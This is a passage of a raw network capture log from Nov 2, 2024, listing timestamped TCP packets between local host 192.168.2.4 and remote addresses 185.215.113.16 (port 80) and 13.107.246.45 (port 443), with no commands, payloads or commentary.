                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358834028 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358849049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358855009 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358876944 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358915091 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358920097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358932018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358968019 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.358989954 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359002113 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359010935 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359021902 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359025002 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359031916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359044075 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359056950 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359061956 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359069109 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359090090 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359108925 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359193087 CET4436382913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.359492064 CET4436382913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.360189915 CET63829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.398192883 CET63829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.398192883 CET63829443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.398230076 CET4436382913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.398257971 CET4436382913.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.404872894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.404920101 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.404959917 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.404999018 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405019999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405029058 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405041933 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405064106 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405071974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405082941 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405098915 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405123949 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405469894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405487061 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405498028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405508041 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405518055 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405522108 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405539036 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405554056 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405683994 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405719042 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405723095 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405734062 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405750036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405760050 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405760050 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405771971 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405793905 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405844927 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405854940 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405873060 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405883074 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405894041 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405894041 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405906916 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405910015 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405925035 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405925035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405937910 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405949116 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405956984 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405958891 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405971050 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405977964 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405981064 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.405994892 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406027079 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406073093 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406081915 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406091928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406102896 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406112909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406116962 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406124115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406126022 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406145096 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406146049 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406157970 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406168938 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406173944 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406179905 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406188011 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406193018 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406215906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406232119 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406239033 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406245947 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406256914 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406264067 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406275988 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406277895 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406286955 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406299114 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406299114 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406306028 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406311989 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406315088 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406331062 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406339884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406368017 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406455994 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406466961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406476974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406500101 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406507015 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406517982 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406528950 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406539917 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406560898 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406574965 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406584024 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406594038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406594992 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406605005 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406610966 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406622887 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406635046 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406640053 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406646967 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406657934 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406670094 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406675100 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406691074 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406709909 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406727076 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406838894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406852961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406862974 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406868935 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406876087 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406888008 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406898975 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406910896 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406936884 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406944036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406955004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406965971 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.406987906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407011032 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407011986 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407023907 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407033920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407052040 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407066107 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407077074 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407082081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407089949 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407108068 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407108068 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407119036 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407133102 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407134056 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407144070 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407156944 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407179117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407185078 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407195091 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407205105 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407216072 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407227039 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407247066 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407253027 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407274961 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407310963 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407375097 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407385111 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407393932 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.407421112 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.408163071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.447819948 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.447832108 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.447840929 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.447885990 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.447913885 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.468461990 CET63834443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.468497038 CET4436383413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.468589067 CET63834443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474721909 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474731922 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474740982 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474752903 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474785089 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474805117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474858999 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474878073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474894047 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474911928 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474912882 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474942923 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474960089 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474971056 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474982023 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.474992037 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475007057 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475084066 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475122929 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475146055 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475155115 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475186110 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475187063 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475197077 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475207090 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475214005 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475219011 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475228071 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475231886 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475244999 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475255966 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475269079 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475331068 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475342035 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475352049 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475366116 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475384951 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475438118 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475449085 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475459099 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475471020 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475476980 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475481987 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475493908 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475493908 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475517988 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475541115 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475714922 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475754023 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475755930 CET63834443192.168.2.413.107.246.45
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475759029 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475765944 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475769997 CET4436383413.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475799084 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475800037 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475812912 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475826025 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475837946 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475837946 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475857973 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475861073 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475860119 CET4436383013.107.246.45192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475874901 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475886106 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475910902 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475964069 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475975037 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475986004 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.475999117 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476001024 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476015091 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476018906 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476043940 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476064920 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476083040 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476094007 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476113081 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476128101 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476222038 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476233006 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476244926 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476255894 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476258993 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476268053 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476279020 CET6381980192.168.2.4185.215.113.16
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476280928 CET8063819185.215.113.16192.168.2.4
                                                                                                                                                                                                                                              Nov 2, 2024 07:16:15.476295948 CET8063819185.215.113.16192.168.2.4
